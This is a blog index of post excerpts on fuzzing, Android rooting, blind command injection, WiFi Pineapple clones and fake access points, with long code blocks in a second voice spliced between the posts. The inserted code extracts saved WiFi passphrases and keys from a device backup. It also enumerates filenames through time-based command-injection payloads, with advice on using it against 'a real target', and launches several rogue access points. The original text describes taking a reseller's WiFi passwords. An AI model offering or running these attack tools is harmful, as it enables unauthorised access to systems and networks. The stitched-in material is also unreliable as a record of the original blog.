American Fuzzy Lop (fuzzer)

I’ve been a fan of lcamtuf for years and recently came across an awesome project of his named “american fuzzy lop”. The basic idea is that it fuzzes input files for the target application while monitoring the execution paths each input exercises, and, more importantly, any crashes. Rather than blindly brute-forcing and hoping for results, it uses that coverage feedback to work its way through the application’s logic (e.g. it only reaches the code behind the header parser once it has stumbled on a valid image header, and then keeps mutating from there).

Read More

Huawei MediaPad T1 Tablet

I recently bought a Huawei MediaPad T1 8″ tablet (for a real bargain, thanks to Hot SA Deals). I’m not much of an Android fan, and really hate how manufacturers push their own user interface (usually degrading the experience further), but I must say I’m rather impressed with this device. Although it has Huawei’s “UI Emotion” interface, and a few custom system apps, it really is pretty good. This device is also known as the “Huawei Honor T1”.

Because of the special I bought it on, mine came with a bunch of bloatware that I wanted to get off – and it wasn’t (immediately) rootable. Both of these problems were fairly easy to solve thanks to this forum post. The process is straightforward (assuming you have an “S8-701u” device):

NOTE: This will wipe your device and all data + settings… so make sure you backup anything you want to keep!

  1. Download the official Russian firmware from here (yes, that’s right, Russian)
  2. Extract the zip file, and copy the “dload” folder (buried in some other folders that will be extracted) to an SD card, then insert it into the tablet
  3. Power off the tablet, then hold down the “volume down” button and turn it on – release all buttons when the Huawei logo start screen shows
  4. The firmware should start installing and will take a while – you should see a progress bar on the screen. You’ll be prompted to remove the SD card when it’s complete (the device should reboot automatically, and may show the Huawei logo screen for a while during startup)
  5. Once the tablet boots, use the language selector at the top of setup wizard screen to select the desired language (assuming you don’t want Russian)
  6. To root it, head over to TowelRoot.com, click the lambda (image) and choose to open with “Browser” (not Chrome), then run the “.apk” once it’s downloaded
  7. Click the “make it ra1n” button in the app and it should do the rest
  8. Download “SuperSU” from the Google Play store (and a “root checker” if need be)

That should be it – worked for me! 🙂


Bonus: my device came with two saved wireless access points (“Arbalest” and “Darknet2”) which seem to belong to the reseller and partner that put all the bloatware on my device… getting the passwords to these access points (prior to changing the firmware) was just a matter of running the pre-installed “Backup” app and saving to SD card, then grabbing the config file from the .zip backup on my PC 😉 Now to find out where those access points are located…
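The post doesn’t say what that config file looked like, so here is an added example (mine, not the author’s) that assumes the backup carried a standard Android wpa_supplicant.conf and pulls every saved network out of the zip. The archive, its paths and the secrets are constructed for the example; only the two SSIDs come from the post. It also handles the two ways wpa_supplicant stores things that a quick grep would miss: SSIDs written as bare hex, and a 64-hex-digit `psk` (the derived key rather than the passphrase), which still gets you onto the network.

```python
import io
import re
import zipfile

# Constructed sample of an Android wpa_supplicant.conf as a device backup might
# carry it. The two SSIDs are the ones from the post; the secrets are made up.
SAMPLE_CONF = """\
ctrl_interface=/data/misc/wifi/sockets
update_config=1

network={
\tssid="Arbalest"
\tpsk="example-passphrase-1"
\tkey_mgmt=WPA-PSK
\tpriority=2
}

network={
\tssid="Darknet2"
\tpsk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
\tkey_mgmt=WPA-PSK
}

network={
\tssid=436f66666565
\tkey_mgmt=NONE
}
"""

HEX_PSK = re.compile(r"^[0-9a-fA-F]{64}$")


def parse_wpa_supplicant(text):
    """Yield one dict of key=value pairs per network={...} block."""
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("network={"):
            current = {}
        elif line == "}" and current is not None:
            yield current
            current = None
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            current[key.strip()] = value.strip()


def decode_ssid(value):
    """wpa_supplicant writes SSIDs either quoted or as bare hex bytes."""
    if value.startswith('"') and value.endswith('"'):
        return value[1:-1]
    return bytes.fromhex(value).decode("utf-8", "replace")


def credential(net):
    """Reduce a network block to what an attacker needs to join it."""
    psk = net.get("psk")
    if psk is None:
        secret, kind = None, "none" if net.get("key_mgmt") == "NONE" else "other"
    elif psk.startswith('"') and psk.endswith('"'):
        secret, kind = psk[1:-1], "passphrase"
    elif HEX_PSK.match(psk):
        # 32-byte PMK derived from the passphrase: not reversible, but
        # wpa_supplicant accepts it directly, so it joins the network just the same.
        secret, kind = psk.lower(), "psk-hex"
    else:
        secret, kind = psk, "unknown"
    return {"ssid": decode_ssid(net.get("ssid", '""')),
            "key_mgmt": net.get("key_mgmt", "WPA-PSK"),
            "secret": secret, "secret_type": kind}


def wifi_credentials_from_backup(zip_bytes):
    """Scan a backup archive for wpa_supplicant.conf and pull every network out."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith("wpa_supplicant.conf"):
                text = zf.read(name).decode("utf-8", "replace")
                found.extend(credential(n) for n in parse_wpa_supplicant(text))
    return found


def build_sample_backup():
    """Constructed stand-in for the backup zip the post pulled off the SD card."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("backup/info.xml", "<backup/>")
        zf.writestr("backup/misc/wifi/wpa_supplicant.conf", SAMPLE_CONF)
    return buf.getvalue()


if __name__ == "__main__":
    for c in wifi_credentials_from_backup(build_sample_backup()):
        print(f"{c['ssid']!r}: {c['key_mgmt']} {c['secret_type']} {c['secret']}")
```

The takeaway for anyone handing out pre-configured devices is the same one the post hints at: a stock “Backup” app with no encryption turns every saved network on the device into plaintext on an SD card, and a reseller’s own credentials travel with it.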

Time-based “Blind Command Injection” Un-blinding

While blind command injection web vulnerabilities are incredibly useful, there’s no reason we shouldn’t make them un-blind. By chaining a slow-running command onto the command whose result we actually care about, we can enumerate (or brute-force) data – such as filenames, paths or strings – from the response time alone, much as time-based blind SQL injection does: Blind_SQL_Injection#Time-based.

Consider the following chained commands:

ls -l a* && ping -c 10 127.0.0.1
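To make the chain above concrete, here is an added example (my own illustration, not code from the original post) that drives a constructed vulnerable handler the way a blind web endpoint would be driven. It assumes a POSIX shell with `ls` and `sleep`, and swaps the post’s `ping -c 10 127.0.0.1` for `sleep` only because that gives a deterministic delay; `vulnerable_handler`, `enumerate_names` and the sample directory are all made up for the demonstration. It goes one step beyond the single `ls -l a*` probe and recovers whole filenames, one character per timed request, exactly as a time-based blind SQLi extracts a string.

```python
import os
import subprocess
import tempfile
import time

# Characters tried at each position. Assumption: the names we want are spelled
# from these; anything outside the set (uppercase, spaces) will not be found.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789._"


def vulnerable_handler(filename, workdir):
    """Constructed stand-in for a blind command-injection sink.

    Like the web handler the post has in mind, it splices an untrusted
    parameter straight into a shell command and reveals nothing about the
    command's output or exit status, so the only signal left is elapsed time.
    """
    subprocess.run(f"ls -l {filename}", shell=True, cwd=workdir,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return "OK"


def timed_probe(expr, workdir, delay):
    """Inject `<expr> && sleep <delay>` and report whether the delay showed up.

    `&&` runs the sleep only if `ls -l <expr>` exited 0, i.e. only if the
    expression matched at least one entry. `sleep` replaces the post's
    `ping -c 10 127.0.0.1` purely because it gives a deterministic delay.
    """
    payload = f"{expr} && sleep {delay}"
    start = time.monotonic()
    vulnerable_handler(payload, workdir)
    return time.monotonic() - start >= delay


def has_prefix(prefix, workdir, delay):
    # `ls -l secr*` succeeds only if some entry starts with "secr".
    return timed_probe(prefix + "*", workdir, delay)


def exists(name, workdir, delay):
    # Without the glob, `ls -l secret.txt` succeeds only for that exact name.
    return timed_probe(name, workdir, delay)


def enumerate_names(workdir, delay=0.1, alphabet=ALPHABET, max_len=32):
    """Recover every name in `workdir` spelled from `alphabet`, one character
    per timed probe, the way time-based blind SQLi recovers a string."""
    found = []

    def walk(prefix):
        # "." and ".." always exist, so they are explored but never reported.
        if prefix and prefix not in (".", "..") and exists(prefix, workdir, delay):
            found.append(prefix)
        if len(prefix) >= max_len:
            return
        for ch in alphabet:
            if has_prefix(prefix + ch, workdir, delay):
                walk(prefix + ch)

    walk("")
    return sorted(found)


def make_sample_dir():
    """Constructed target directory: two files the attacker cannot list directly."""
    workdir = tempfile.mkdtemp()
    for name in ("secret.txt", "notes.md"):
        open(os.path.join(workdir, name), "w").close()
    return workdir


if __name__ == "__main__":
    print(enumerate_names(make_sample_dir()))
```

Two caveats when you take this to a real target. First, the threshold: `ping -c 10` gives roughly nine seconds, `sleep` gives exactly what you ask for, and either way the delay must sit well above the normal jitter of the endpoint or you will mis-read a slow response as a match. Second, the payload shape depends on where the parameter lands: if the application wraps it in quotes you need to close them first (and usually comment out the rest with `#`), and if the app runs commands through something other than a POSIX shell the `&&` and glob semantics change with it.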

Read More

VirtualBox tips and tricks

I’ve recently built a rather large VM collection of different operating systems (mostly versions of Windows) using VirtualBox, and here are a few things I learnt along the way. Admittedly these are more aimed at running Windows as your host machine.

1. Shrinking disk images:

While “.vmdk” disk images may be more portable to other virtualization software (e.g. VMware), “.vdi” images can be compacted to reduce the space they use on your host drive. After regular use, or system upgrades, a dynamically expanding disk can end up much larger than the data it actually holds, so here’s how to shrink it back down:

Read More

Fizz Buzz Test

I recently heard about the “Fizz Buzz Test”, a kind of programming “interview” question or challenge. In short, for each number you have to output “Fizz” if it is divisible by 3, “Buzz” if it is divisible by 5, “Fizz Buzz” if it is divisible by both, and otherwise the number itself.

There’s a great explanation about the problem, and why it’s not as simple as it seems, at http://c2.com/cgi/wiki?FizzBuzzTest
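As an added example (mine, not the author’s own solution, which is in the full post), here is the version I would want to see in an interview, in Python. It builds the answer from the two independent tests, so the divisible-by-both case falls out naturally instead of needing a third branch that is easy to put in the wrong order (check `% 3` first and 15 silently becomes “Fizz”).

```python
def fizzbuzz(n):
    """Return the Fizz Buzz word for n, or str(n) when neither rule fires.

    Composing the result from the two tests independently avoids the classic
    trap of testing "divisible by 3" first and never reaching the
    "divisible by both" case for 15, 30, ...
    """
    words = []
    if n % 3 == 0:
        words.append("Fizz")
    if n % 5 == 0:
        words.append("Buzz")
    return " ".join(words) or str(n)  # the post's spelling: "Fizz Buzz" with a space


def fizzbuzz_sequence(start=1, stop=100):
    """The usual interview form: every value from start to stop, inclusive."""
    return [fizzbuzz(n) for n in range(start, stop + 1)]


if __name__ == "__main__":
    print("\n".join(fizzbuzz_sequence()))
```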

Here’s my go at it:

Read More

TP-Link TL-WR703N Router as a WiFi Pineapple

There’s a great wireless hacking/security tool called a “WiFi Pineapple”, which costs $100. I found a rather popular blog post, titled “Blue For The Pineapple”, showing how to turn a TP-Link TL-WR703N router into a WiFi Pineapple clone. The reason you’d want to do this? The TP-Link TL-WR703N router costs a mere $20 (I bought mine from this ebay seller) – not a bad saving!

While that blog post has a lot of great information, I found an easier-to-follow post on doing the same with a TP-LINK TL-MR3020 router, and all of its steps worked great on my router. The “Blue For The Pineapple” post also seems to require some tweaks and hacks to get “infusions” working, whereas things seem to work a lot better when following the instructions in the “TL-MR3020” post.

To make things even easier, and save you some time, I’ve decided to write this blog post and link to pre-made raw USB images you can just write to a USB and (after the steps below) boot.

NOTE: This post is based on Samiux’s TL-MR3020 blog post, and I don’t understand half of this; I’ve just provided a way to skip the USB drive creation steps, so I can’t really provide any help or support. You could “brick” your router by flashing it with the wrong version of OpenWRT or if you have an unsupported router version – please read all of their documentation, and follow the steps at your own risk!

Basically you need to install OpenWRT on your router, create a USB flash drive from one of the images I provide, configure your router to use the flash drive as its main storage, and then configure your computer’s networking. Here we go:

Read More

Installing CyanogenMod 10.0.0 (Android 4.1.2) on LG P970 (and “Security Error” fix)

Thanks to this great forum thread: “The Big N00B how-to!” I’ve managed to get CyanogenMod 10.0.0 (Android 4.1.2) installed on my LG P970. I spent literally hours just trying to get ClockworkMod installed… ROM Manager seemed to get stuck at 100% of the installation, and nothing else I tried worked.

Installing CyanogenMod:

After many attempts and different combinations, what worked for me was: download the CyanogenMod zip and put it on my phone’s SD card (while you’re at it, you should probably download the Google Play Store app from http://goo.im/gapps or http://androidjinn.com/download-latest-gapps-or-google-apps.html and put it on your SD card as well), download the V20 ROM from the forum thread above, and flash it with SmartFlashTool (see my previous thread about using it).

Read More

LG P970: Upgrading to Android 4.0.4 and Rooting

As mentioned in a previous blog post, I have an LG P970 Android phone… unfortunately LG have taken a while rolling out updates. At the time of writing this post the official software still thinks Android 2.2 is the latest version available – as it turns out, that’s only for South Africa… some other regions have (“official”) software updates to Android 4.0.4 (Ice Cream Sandwich).

See this link for a list of official downloads: http://www.lg-phones.org/official-stock-lg-optimus-black-firmware-rom.html – note the “V20” or “V30” in the URLs/filenames. The “V10” is the original software that comes on the phone (Android 2.2), “V20” is Android 2.3.4, and “V30” is Android Ice Cream Sandwich (4.0.4). Depending on the country heading you look under, “V30” might not be listed. In my case, South Africa, only V10 and V20 are available, and they end with the letter “E” – I thought this might be important (and that I could only use other “E” software versions), but it seems not to be, as I was able to update with “V30B” and everything seems to be working fine.

Read More

Fake (wireless) Access Points with airbase-ng

After reading @TroyHunt’s blog post about the (wifi) Pineapple he’s been playing with, I got a little jealous and was considering buying one of my own – $100 at HakShop – but didn’t really feel like parting with the money or waiting forever for it to arrive. I looked into how it works, what software it uses, and what alternatives there are…

In short “airbase-ng” (one of the “aircrack-ng” tools) seems to cover most of the bases. One of the useful things it does is allow you to create fake access points with a name you specify – used properly this provides some great attack vectors, but it’s also just fun to push your own text (or lots of it) in to nearby people’s wireless access points lists. You do need to run “airmon-ng start <interface>” before using it though.

I wanted to create multiple fake access points, which at the time of writing this “airbase-ng” didn’t support (I don’t think), so I had to run the command multiple times. Thinking I may want to do this regularly in the future, I decided to write a simple bash script to simplify the process – having it just take in the name for the access point as a command line option. I noticed that my iPhone only listed 1 faked access point, unless I specified a different MAC address for each instance of “airbase-ng” running… so I included some code to generate a faked MAC address as well (pastebin here: http://pastebin.com/XcMT37T8):

[image: fakeap01]
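The bash script itself is in the screenshot and pastebin above. As an added example that is not the author’s code, here is a Python equivalent of the approach described: it generates a random locally administered unicast MAC per fake AP, which is what stops a phone collapsing all the fake networks into one entry, and builds one `airbase-ng -a <bssid> -e <essid> <iface>` command line per name (`-a`, `-e` and `-c` are real airbase-ng options). The interface name `wlan0mon`, the sample ESSIDs and the helper names are my assumptions; actually launching anything still needs aircrack-ng, root, and an interface already put into monitor mode with `airmon-ng start <interface>`.

```python
import random
import re
import subprocess

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")


def random_unicast_laa_mac(rng=random):
    """Random locally administered unicast MAC address.

    In the first octet, bit 0 is the multicast flag (must be clear for a
    BSSID) and bit 1 is the locally-administered flag (set, so the address
    cannot be mistaken for a vendor-assigned OUI).
    """
    first = (rng.randrange(256) & 0xFC) | 0x02
    rest = [rng.randrange(256) for _ in range(5)]
    return ":".join(f"{b:02x}" for b in [first, *rest])


def is_valid_bssid(mac):
    """True for a well-formed, unicast, locally administered address."""
    if not MAC_RE.match(mac):
        return False
    first = int(mac[:2], 16)
    return first & 0x03 == 0x02


def airbase_argv(essid, monitor_iface, bssid=None, channel=None):
    """Command line for one airbase-ng instance.

    `-a` sets the BSSID and `-e` the ESSID; a distinct BSSID per instance is
    what makes a client list each fake AP separately.
    """
    argv = ["airbase-ng", "-a", bssid or random_unicast_laa_mac(), "-e", essid]
    if channel is not None:
        argv += ["-c", str(channel)]
    argv.append(monitor_iface)
    return argv


def plan_fake_aps(essids, monitor_iface, channel=None):
    """One argv per ESSID, each with its own freshly generated BSSID."""
    return [airbase_argv(e, monitor_iface, channel=channel) for e in essids]


def launch_fake_aps(essids, monitor_iface="wlan0mon", channel=None):
    """Spawn the instances (assumes aircrack-ng, root and a monitor-mode
    interface; the interface name is a placeholder). Not called by default."""
    return [subprocess.Popen(argv)
            for argv in plan_fake_aps(essids, monitor_iface, channel)]


if __name__ == "__main__":
    import sys
    names = sys.argv[1:] or ["Free Wifi", "Pineapple-Demo"]  # constructed sample ESSIDs
    for argv in plan_fake_aps(names, "wlan0mon", channel=6):
        print(" ".join(argv))
```

Pinning every instance to the same channel keeps all the beacons visible to a client that is sitting on that channel, and the locally-administered bit is a courtesy as much as a correctness point: a randomly generated address with that bit clear could collide with a real vendor OUI and make the fake AP look like someone else’s hardware in a site survey.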

Read More

Why EA and their “Origin” gaming platform suck

I’d heard bad things about EA’s “Origin” gaming platform – an alternative to Valve’s “Steam” – but luckily I haven’t had to use it yet. SimCity 5 changed that, and I made the purchase and downloaded “Origin”.

With the game releasing tomorrow (if you live in the US… or connect via a US VPN) I wanted to make sure I was set up and ready to go, but didn’t see SimCity 5 listed in the Origin client, so logged in to my account and checked my Order History:

[image: OriginSucks2]

Read More